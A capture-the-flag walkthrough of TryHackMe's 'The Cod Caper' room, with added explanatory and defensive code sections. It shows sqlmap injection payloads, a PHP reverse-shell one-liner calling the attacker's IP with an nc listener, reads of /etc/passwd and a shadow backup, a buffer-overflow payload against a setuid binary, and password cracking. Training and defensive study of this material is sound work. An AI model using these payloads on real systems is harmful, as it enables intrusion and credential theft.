Tryhackme - The Cod Caper


In this walkthrough, we will be going through The Cod Caper room from TryHackMe. In this room, we will go through the journey of infiltrating and exploiting a Linux system. So without any delay, let’s get started.

The Cod Caper

Machine Info:

Title: The Caping of Cod
IP address: 10.10.126.161
Difficulty: Easy
Objective: A guided room taking you through infiltrating and exploiting a Linux system.

Task 1 – Intro


Task 2 – Host Enumeration

The first step is to see what ports and services are running on the target machine.

Recommended Tool – nmap:

Useful flags:

nmap useful flags

wh1terose@fsociety:~$ sudo nmap -sS -sV -sC 10.10.126.161 

Nmap scan report for 10.10.126.161
Host is up (0.26s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6d:2c:40:1b:6c:15:7c:fc:bf:9b:55:22:61:2a:56:fc (RSA)
|   256 ff:89:32:98:f4:77:9c:09:39:f5:af:4a:4f:08:d6:f5 (ECDSA)
|_  256 89:92:63:e7:1d:2b:3a:af:6c:f9:39:56:5b:55:7e:f9 (ED25519)
-- snipped --


53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

--snipped --
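The scan output above answers the first four questions, and the one detail that trips people up is the difference between "open" and "filtered": port 53 is filtered (a firewall dropped the probe), so only two ports are open. As an added example, not code from the page or from nmap, here is a small parser for nmap's normal output that makes that distinction explicit and pulls the service version and NSE script lines out of the constructed sample below, which reproduces the relevant lines of the scan.

```python
import re

# Constructed sample: the port and script lines from the nmap output quoted above.
NMAP_OUTPUT = """\
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6d:2c:40:1b:6c:15:7c:fc:bf:9b:55:22:61:2a:56:fc (RSA)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
"""

# "22/tcp open  ssh  OpenSSH 7.2p2 ..." -> port, proto, state, service, optional version
PORT_LINE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(open|closed|filtered|unfiltered|open\|filtered|closed\|filtered)\s+(\S+)(?:\s+(.*))?$"
)
# "|_http-title: ..." -> NSE script name and its first output line
SCRIPT_LINE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")


def parse_nmap(text):
    """Parse nmap's normal output into one dict per port; script output is attached to the port above it."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": (m.group(5) or "").strip(), "scripts": {},
            })
            continue
        s = SCRIPT_LINE.match(line)
        if s and ports:
            ports[-1]["scripts"][s.group(1)] = s.group(2).strip()
    return ports


def open_ports(ports):
    """Only 'open' counts; 'filtered' means a firewall dropped the probe, not that a service answered."""
    return [p for p in ports if p["state"] == "open"]


def summarize(text):
    """The four facts the room asks for, derived from the parsed scan."""
    ports = parse_nmap(text)
    return {
        "open_count": len(open_ports(ports)),
        "services": {p["port"]: p["version"] for p in open_ports(ports)},
        "http_title": next((p["scripts"].get("http-title") for p in ports if "http-title" in p["scripts"]), None),
    }


if __name__ == "__main__":
    print(summarize(NMAP_OUTPUT))
```

For anything beyond a quick look, prefer `nmap -oX` and parse the XML instead; the normal output format is meant for humans and its layout is not guaranteed between versions.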

Question 1 – How many ports are open on the target machine?

2

Question 2 – What is the http-title of the web server?

Apache2 Ubuntu Default Page: It works

Question 3 – What version is the ssh service?

OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

Question 4 – What is the version of the web server?

Apache/2.4.18


Task 3 – Web Enumeration

Since the only services running are SSH and Apache, it is safe to assume that we should check out the web server first for possible vulnerabilities. One of the first things to do is to see what pages are available to access on the web server.

Recommended tool: gobuster

Useful flags:

gobuster useful flags

wh1terose@fsociety:~$ gobuster dir -u http://10.10.126.161/ -w ~/Desktop/Wordlist/big.txt -x php,txt,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.126.161/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php,txt
[+] Timeout:                 10s
===============================================================
2023/05/09 22:00:07 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.txt        (Status: 403) [Size: 278]
/.htpasswd.php        (Status: 403) [Size: 278]
/.htaccess.html       (Status: 403) [Size: 278]
/.htpasswd.txt        (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess.php        (Status: 403) [Size: 278]
/.htpasswd.html       (Status: 403) [Size: 278]
/administrator.php    (Status: 200) [Size: 409]
Progress: 13592 / 81912 (16.59%)

gobuster scan

Question 1 – What is the name of the important file on the server?

administrator.php


Task 4 – Web Exploitation

The admin page seems to give us a login form. In situations like this it is always worth it to check for “low-hanging fruit”. In the case of login forms one of the first things to check for is SQL Injection.

Recommended Tool: sqlmap

sqlmap useful tools

wh1terose@fsociety:~/Tools/sqlmap-dev$ python3 sqlmap.py -u http://10.10.126.161/administrator.php --forms --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.11.10#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:37:09 /2023-05-09/

[22:37:09] [INFO] testing connection to the target URL
[22:37:10] [INFO] searching for forms
[1/1] Form:
POST http://10.10.126.161/administrator.php
POST data: username=&password=
do you want to test this form? [Y/n/q] 
Y
Edit POST data [default: username=&password=] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
[22:38:23] [INFO] resuming back-end DBMS 'mysql' 
[22:38:23] [INFO] using '/home/wh1terose/.sqlmap/output/results-05092023_1038pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=dYgw' RLIKE (SELECT (CASE WHEN (7626=7626) THEN 0x64596777 ELSE 0x28 END))-- YFJq&password=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=dYgw' OR (SELECT 3854 FROM(SELECT COUNT(*),CONCAT(0x71707a7a71,(SELECT (ELT(3854=3854,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TGXB&password=

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: username=dYgw' OR (SELECT 2064 FROM (SELECT(SLEEP(5)))ZgLa)-- YFbf&password=
---
do you want to exploit this SQL injection? [Y/n] 
[22:39:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[22:39:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[22:39:07] [INFO] fetching current database
[22:39:07] [INFO] resumed: 'users'
[22:39:07] [INFO] fetching tables for database: 'users'
[22:39:08] [INFO] retrieved: 'users'
[22:39:08] [INFO] fetching columns for table 'users' in database 'users'
[22:39:09] [INFO] retrieved: 'username'
[22:39:09] [INFO] retrieved: 'varchar(100)'
[22:39:10] [INFO] retrieved: 'password'
[22:39:12] [INFO] retrieved: 'varchar(100)'
[22:39:12] [INFO] fetching entries for table 'users' in database 'users'
[22:39:12] [INFO] retrieved: 'secretpass'
[22:39:12] [INFO] retrieved: 'pingudad'
Database: users
Table: users
[1 entry]
+------------+----------+
| password   | username |
+------------+----------+
| secretpass | pingudad |
+------------+----------+

[22:39:12] [INFO] table 'users.users' dumped to CSV file '/home/wh1terose/.sqlmap/output/10.10.126.161/dump/users/users.csv'
[22:39:12] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/wh1terose/.sqlmap/output/results-05092023_1038pm.csv'

[*] ending @ 22:39:12 /2023-05-09/

Question 1 – What is the admin username?

pingudad

Question 2 – What is the admin password?

secretpass

Question 3 – How many forms of SQLI is the form vulnerable to?

3
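All three injection types sqlmap reported exist for the same reason: the login form splices the submitted username straight into the query text. As an added example (not the room's PHP and not sqlmap's code), the snippet below builds an in-memory SQLite stand-in for the `users` table with the credentials dumped above, then shows the concatenated query beside the parameterized one. The MySQL-specific payloads in the sqlmap output (`RLIKE`, `SLEEP`) do not apply to SQLite, so the plain comment-out form is used to show the difference.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the room's users table, seeded with the dumped credentials."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('pingudad', 'secretpass')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the user's input becomes part of the SQL grammar.
    A username such as  pingudad'--  closes the quote and comments out the password check."""
    sql = (
        "SELECT COUNT(*) FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, username, password):
    """Placeholders: the driver passes the input as data, so a quote in the username
    is compared literally and can never change the query's structure."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def compare(username, password):
    """Run both versions against the same input so the difference is visible side by side."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, username, password),
        "parameterized": login_parameterized(conn, username, password),
    }


if __name__ == "__main__":
    print(compare("pingudad'-- ", "wrong"))      # vulnerable: True, parameterized: False
    print(compare("pingudad", "secretpass"))     # both True: real credentials still work
```

Two defender notes on the dump itself: the boolean-based and time-based variants sqlmap used show that the form never has to echo data for the table to be extracted, one yes/no answer per query is enough; and the dumped password is stored in clear text, so even with parameterized queries the table should hold a slow password hash (bcrypt, scrypt, argon2), not the password.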


Task 5 – Command Execution

It seems we have gained the ability to run commands! Since this is my old PC, I should still have a user account! Let’s run a few test commands, and then try to gain access!

Method 1: nc Reverse shell:

This machine has been outfitted with nc, a tool that allows you to make and receive connections and send data. It is one of the most popular tools to get a reverse shell. Some great places to find reverse shell payloads are highoncoffee and Pentestmonkey

After this you will have to do some additional enumeration to find pingu’s ssh key, or hidden password

Method 2: Hidden passwords:

Assuming my father hasn’t modified it since he took over my old PC, I should still have my hidden password stored somewhere; I don’t recall where, though, so you’ll have to find it! find is the recommended tool here as it allows you to search for which files a user specifically owns.

php -r '$sock=fsockopen("10.18.11.103",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Run Command

nc -lvnp 4444

netcat listener

wh1terose@fsociety:~/Tools/sqlmap-dev$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.126.161 36054
/bin/sh: 0: can't access tty; job control turned off
$ ls
2591c98b70119fe624898b1e424b5e91.php
administrator.php
index.html
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
papa:x:1000:1000:qaa:/home/papa:/bin/bash
mysql:x:108:116:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
pingu:x:1002:1002::/home/pingu:/bin/bash

$ find / -type f -name pass 2> /dev/null
/var/hidden/pass
$ cat /var/hidden/pass
pinguapingu
$ 

cat /var/hidden/pass


Task 6 – LinEnum

LinEnum is a bash script that searches for possible ways to priv esc. It is incredibly popular due to the sheer amount of possible methods that it checks for, and often LinEnum is one of the first things to try when you get shell access.

Methods to get Linenum on the system

Method 1: SCP

Since you have ssh access on the machine you can use SCP to copy files over. In the case of Linenum you would run scp {path to linenum} {user}@{host}:{path}. Example: scp /opt/LinEnum.sh [email protected]:/tmp would put LinEnum in /tmp.

Method 2: SimpleHTTPServer

SimpleHTTPServer is a module that hosts a basic webserver on your host machine. Assuming the machine you compromised has a way to remotely download files, you can host LinEnum and download it.

Note: There are numerous ways to do this and the two listed above are just my personal favorites.

Once you have LinEnum on the system, it’s as simple as running it and looking at the output once it finishes.
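The SUID check that LinEnum (and linpeas, which the screenshot below shows) performs is nothing more than a walk over the filesystem looking at one mode bit, and it is the same check a defender runs to baseline a host. As an added example, written here and not taken from either script, the code below implements that walk and exercises it on a constructed temporary tree (one setuid file placed at `opt/secret/root` to mirror the room's answer, one ordinary file), so it runs without touching the real system.

```python
import os
import stat
import tempfile


def find_suid_files(root):
    """Return the regular files under `root` with the setuid bit set.
    Symlinks are not followed and unreadable entries are skipped, matching
    `find / -perm -4000 -type f 2>/dev/null`."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def describe(path):
    """Owner uid and octal mode, the two things worth reporting for each hit."""
    st = os.lstat(path)
    return {"path": path, "uid": st.st_uid, "mode": oct(stat.S_IMODE(st.st_mode))}


def demo():
    """Constructed tree (not the room's filesystem): one setuid file, one plain file.
    Returns the hits relative to the temporary root."""
    tmp = tempfile.mkdtemp()
    os.makedirs(os.path.join(tmp, "opt", "secret"))
    suid = os.path.join(tmp, "opt", "secret", "root")
    plain = os.path.join(tmp, "opt", "notes.txt")
    for p in (suid, plain):
        with open(p, "wb") as f:
            f.write(b"placeholder, not a real binary")
    os.chmod(suid, 0o4755)   # rwsr-xr-x: the bit LinEnum is looking for
    os.chmod(plain, 0o755)   # rwxr-xr-x: ordinary executable, ignored
    return [p[len(tmp):] for p in find_suid_files(tmp)]


if __name__ == "__main__":
    print(demo())   # ['/opt/secret/root']
```

On a real host the interesting output is the difference against a known-good list: the distribution's own setuid binaries (`passwd`, `sudo`, `mount` and so on) are expected, while a setuid file under a path like `/opt/secret` is exactly the kind of entry that should be either removed or justified.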

Question 1 – What is the interesting path of the interesting suid file

Linpeas SUID

/opt/secret/root


Task 7 – pwndbg

Luckily for us I was able to snag a copy of the source code from my dad’s flash drive

```c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

/* Never reached in normal execution. Because the binary is setuid, this
   drops to uid/gid 1000 (papa, per /etc/passwd above) and prints the
   shadow backup; redirecting execution here is the goal of the overflow. */
void shell()
{
    setuid(1000);
    setgid(1000);
    system("cat /var/backups/shadow.bak");
}

/* scanf("%s") has no length limit: anything longer than 32 bytes runs off
   the end of buffer and overwrites the saved return address on the stack. */
void get_input()
{
    char buffer[32];
    scanf("%s", buffer);
}

int main()
{
    get_input();
}
```

The SUID file seems to expect 32 characters of input, and then immediately exits. This seems to warrant further investigation. Luckily I was practicing binary exploitation back when I was using that PC, so I have tools preinstalled to examine. One of those tools is pwndbg, a plugin for GDB which allows you to better examine binary files.

Run gdb /opt/secret/root and you should see a screen similar to this

gdb

This means that pwndbg has successfully been initialized. The next step is to test if anything happens when you send more than 32 characters. To do this type r < <(cyclic 50), that command runs the program and provides 50 characters worth of “cyclic” input.

Cyclic input goes like this: “aaaaaaaabaaacaaadaaaeaaaf” etc. Because it’s in this “cyclic” format, it allows us to better understand the control we have over certain registers, for reasons you are about to see.

Once you run that command you should see something similar to this screen

gdb

Now this is where some knowledge of assembly helps. It seems that in this case we’re able to overwrite EIP, which is known as the instruction pointer. The instruction pointer tells the program which bit of memory to execute next, which in an ideal case would have the program run normally. However, since we’re able to overwrite it, we can theoretically execute any part of the program at any time.

Recall the shell function from the source code, if we can overwrite EIP to point to the shell function, we can cause it to execute. This is also where the benefits of cyclic input show themselves. Recall that cyclic input goes in 4 character/byte sequences, meaning we’re able to calculate exactly how many characters we need to provide before we can overwrite EIP.

Luckily cyclic provides this functionality with the -l flag: running cyclic -l {fault address} will tell us exactly how many characters we need to provide before we can overwrite EIP.

Running cyclic -l 0x6161616c outputs 44, meaning we can overwrite EIP once we provide 44 characters of input.
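Why does `cyclic -l 0x6161616c` come out as 44? The pattern is a de Bruijn sequence over the lowercase alphabet with window size 4, so every 4-byte window occurs exactly once and its position identifies the offset; the crash value `0x6161616c` is the little-endian view of the bytes `laaa`. The code below is an added illustration (not pwntools' source, although it uses the same standard construction) that generates the pattern and looks the offset up, reproducing the number the room gets.

```python
import string
import struct

ALPHABET = string.ascii_lowercase


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield the de Bruijn sequence B(k, n) over `alphabet`, k = len(alphabet):
    every length-n string appears exactly once, so any n-byte window identifies
    its own offset. Standard recursive construction, the same one pwntools uses."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4):
    """First `length` characters of the pattern, like `cyclic 50` on the command line."""
    out = []
    for ch in de_bruijn(n=n):
        if len(out) == length:
            break
        out.append(ch)
    return "".join(out)


def cyclic_find(value, max_len=0x10000):
    """Offset of a 4-byte window in the pattern, like `cyclic -l`.
    `value` may be the integer the register held (decoded little-endian, as on x86)
    or the window itself as str/bytes. Returns -1 if it is not within max_len bytes."""
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("ascii")   # 0x6161616c -> "laaa"
    elif isinstance(value, bytes):
        needle = value.decode("ascii")
    else:
        needle = value
    if len(needle) != 4:
        raise ValueError("need a 4-byte window, got %d bytes" % len(needle))
    return cyclic(max_len).find(needle)


if __name__ == "__main__":
    print(cyclic(50))                 # aaaabaaacaaadaaaeaaaf...
    print(cyclic_find(0x6161616c))    # 44
```

The 44 is 32 bytes of `buffer` plus the saved frame pointer and the compiler's stack padding, which is why reading the source alone does not give the number; the pattern measures the layout the compiler actually produced.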

That’s all we needed for pre-exploitation!

Question 1 – Read the above 🙂

Done


Task 8 – Binary Exploitation: Manually

Question 1 – Woohoo!

Done

```bash
(gdb) disassemble shell
Dump of assembler code for function shell:
   0x080484cb <+0>:	push   %ebp
   0x080484cc <+1>:	mov    %esp,%ebp
   0x080484ce <+3>:	sub    $0x8,%esp
   0x080484d1 <+6>:	sub    $0xc,%esp
   0x080484d4 <+9>:	push   $0x3e8
   0x080484d9 <+14>:	call   0x80483a0 <setuid@plt>
   0x080484de <+19>:	add    $0x10,%esp
   0x080484e1 <+22>:	sub    $0xc,%esp
   0x080484e4 <+25>:	push   $0x3e8
   0x080484e9 <+30>:	call   0x8048370 <setgid@plt>
   0x080484ee <+35>:	add    $0x10,%esp
   0x080484f1 <+38>:	sub    $0xc,%esp
   0x080484f4 <+41>:	push   $0x80485d0
   0x080484f9 <+46>:	call   0x8048380 <system@plt>
   0x080484fe <+51>:	add    $0x10,%esp
   0x08048501 <+54>:	nop
   0x08048502 <+55>:	leave  
   0x08048503 <+56>:	ret    
End of assembler dump.

$ python -c 'print "A"*44 + "\xcb\x84\x04\x08"' | /opt/secret/root    
root:$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.:18277:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18277:0:99999:7:::
uuidd:*:18277:0:99999:7:::
papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7:::
Segmentation fault
```


Task 9 – Binary Exploitation: The pwntools way

Question 1 – Even more woohoo!

Done

Task 10 – Finishing the job

Now that we have the password hashes, we can crack them and get the root password! Recall from the previous outputs that our root password hash is “$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.“.

Luckily hashcat supports cracking linux password hashes. You can find a list of hashcat modes here and rockyou.txt(a popular wordlist) here (if you don’t already have it on your system)
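Before throwing a wordlist at a shadow dump it is worth reading the hash fields themselves: the `$6$` prefix on root's entry is sha512crypt, John's "Cost 1 (iteration count) is 5000" is the scheme's default round count (no explicit `rounds=` in the field), `*` marks accounts with no usable password, and papa's `$1$` entry is md5crypt, an obsolete scheme that is far cheaper to attack. As an added example (not John's or hashcat's code), the parser below classifies a constructed sample assembled from the dump in Task 8 and flags the entries a password audit would report.

```python
# Constructed sample assembled from lines of the shadow dump shown in Task 8
# (the live file is /etc/shadow and is readable only by root).
SHADOW_SAMPLE = """\
root:$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.:18277:0:99999:7:::
daemon:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7:::
"""

# crypt(3) scheme identifiers, as they appear between the first two '$'
CRYPT_IDS = {
    "1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt",
}
SHA_CRYPT_DEFAULT_ROUNDS = 5000          # used when no "rounds=N" is present
OBSOLETE = {"md5crypt", "descrypt"}      # fast schemes an audit should flag


def classify_hash(field):
    """Describe the password field of one shadow entry."""
    if field == "":
        return {"status": "empty", "algorithm": None, "rounds": None}
    if field.startswith(("!", "*")):
        return {"status": "locked", "algorithm": None, "rounds": None}
    if not field.startswith("$"):
        return {"status": "active", "algorithm": "descrypt", "rounds": None}
    parts = field.split("$")             # "$6$salt$hash" -> ["", "6", "salt", "hash"]
    algorithm = CRYPT_IDS.get(parts[1], "unknown:" + parts[1])
    rounds = None
    if algorithm in ("sha256crypt", "sha512crypt"):
        rounds = SHA_CRYPT_DEFAULT_ROUNDS
        if len(parts) > 2 and parts[2].startswith("rounds="):
            rounds = int(parts[2][len("rounds="):])
    return {"status": "active", "algorithm": algorithm, "rounds": rounds}


def parse_shadow(text):
    """One dict per entry: user, raw hash field and its classification."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        entry = {"user": fields[0], "hash": fields[1]}
        entry.update(classify_hash(fields[1]))
        entries.append(entry)
    return entries


def audit(entries):
    """Users whose password field is empty or whose active hash uses an obsolete scheme."""
    return sorted(e["user"] for e in entries
                  if e["status"] == "empty" or e["algorithm"] in OBSOLETE)


if __name__ == "__main__":
    for e in parse_shadow(SHADOW_SAMPLE):
        print(e["user"], e["status"], e["algorithm"], e["rounds"])
    print("flagged:", audit(parse_shadow(SHADOW_SAMPLE)))   # flagged: ['papa']
```

The remediation this points to is the usual one: a backup copy of shadow left world-readable in `/var/backups` is the real failure, and independently of that, legacy `$1$` entries should be rehashed on next login and the default sha512crypt round count raised (or yescrypt used) so that a leaked hash costs an attacker considerably more than 5000 iterations per guess.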

Recommended tool – Hashcat:

Usage: hashcat {flags} {hashfile} {wordlist}

hashcat useful flags

wh1terose@fsociety:~/CTF/TryHackme/The COD caper$ ~/Tools/john/run/john hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
love2fish        (?)     
1g 0:00:00:14 DONE 2/3 (2023-05-09 23:41) 0.06868g/s 8158p/s 8158c/s 8158C/s 652652..ilovemel
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

John Cracking

Question 1 – What is the root password!

love2fish


Task 11 – Thank you!



So that was “The Cod Caper” for you. In this room, we have learned how to infiltrate and exploit a Linux system. We started with basic host enumeration with nmap. Then we performed some directory bruteforcing and web enumeration with gobuster. Moving on, we exploited a SQL injection vulnerability and dumped the username and password combo. Further, we exploited a command injection vulnerability and got our initial shell access with netcat. Moving ahead to privilege escalation, we used the LinEnum script. At last, we looked into some binary exploitation with pwntools, pwndbg and gdb. On that note, I will take my leave, but stay tuned for the next one and till then, remember to “Hack the planet”.
